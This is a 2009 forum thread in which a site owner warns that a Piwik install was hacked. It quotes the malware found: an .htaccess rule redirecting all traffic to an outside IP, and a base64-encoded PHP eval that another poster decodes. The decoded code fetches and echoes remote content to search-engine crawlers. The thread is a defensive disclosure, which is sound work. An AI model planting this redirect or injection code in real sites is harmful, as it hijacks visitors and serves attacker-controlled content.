To anyone using piwik 0.4.5; seems it's hackable

MuonTrail · #1 (**permalink**) 11-23-2009, 05:42 PM

Just noticed today that my piwik install got hacked. Not exactly sure how yet, but this is what it looks like he did.

This was added to my htaccess

Code:

RewriteRule .* http://91.207.4.19/tds/go.php?sid=1 [R,L]

And this lovely snippet was added to my index.php

Code:

eval(base64_decode("aWYoc3RyaXBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdnb29nbGUnKSBvciBzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ3lhaG9vJykgb3Igc3RyaXBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdtc24nKSBvciBzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ2xpdmUnKSkNCnsNCiAgJHIgPSAnJzsNCiAgaWYoJGY9QGZzb2Nrb3BlbignOTEuMjA3LjQuMTgnLDgwLCRlLCRlciwxMCkgYW5kIEBmcHV0cygkZiwgIkdFVCAvbGlua2l0L2luLnBocD9kb21haW49IiAuIHVybGVuY29kZSgkX1NFUlZFUlsiU0VSVkVSX05BTUUiXSkgLiAiJnVzZXJhZ2VudD0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiIEhUVFAvMS4wXHJcbkhvc3Q6IDkxLjIwNy40LjE4XHJcblxyXG4iKSkNCiAgd2hpbGUoICRsID0gZnJlYWQoJGYsIDEwMjQpKSAkciAuPSAkbDsNCiAgQGZjbG9zZSgkZik7DQogICRwPXN0cnBvcygkciwiXHJcblxyXG4iKTsgZWNobyBzdWJzdHIoJHIsJHArNCk7DQp9"));

I haven't really dug into this yet. Just wanted to give a quick heads up to anyone who might be using piwik to check their installs.

**Alex Brooks** · #2 (**permalink**) 11-24-2009, 01:11 AM

How do you know that this was a fault of Piwiks?

sonneti · #3 (**permalink**) 11-24-2009, 03:52 AM

I know f'all about php but i'd guess it is redirecting your search engine traffic?

Code:

if(stripos($_SERVER[\'HTTP_USER_AGENT\'], \'google\') or stripos($_SERVER[\'HTTP_USER_AGENT\'], \'yahoo\') or stripos($_SERVER[\'HTTP_USER_AGENT\'], \'msn\') or stripos($_SERVER[\'HTTP_USER_AGENT\'], \'live\'))
{
  $r = \'\';
  if($f=@fsockopen(\'91.207.4.18\',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER[\'HTTP_USER_AGENT\']) . " HTTP/1.0\\r\\nHost: 91.207.4.18\\r\\n\\r\\n"))
  while( $l = fread($f, 1024)) $r .= $l;
  @fclose($f);
  $p=strpos($r,"\\r\\n\\r\\n"); echo substr($r,$p+4);
}

MuonTrail · #4 (**permalink**) 11-24-2009, 04:04 AM

Well, I'm not sure it was piwik anymore. I finally had time to start digging into it and he got all my website on that host. The most likely suspect is one of my wordpress installs. Probably a bad plugin. Meh.

I was thinking search engine spider traffic... after all, traffic I get from the search engines shouldn't show the name of the search engine in the user-agent would they, I don't think?

The code he base64'd just returned (at the time) an empty hidden div, which would have been added at the end of my pages. Though I can't imagine what he would possibly want to do with spider traffic. And I still haven't figured out what he exploited. Meh.

So it was a false alarm for piwik. But if you use a crap-load of plugins on your wordpress sites you might want to do periodic checks.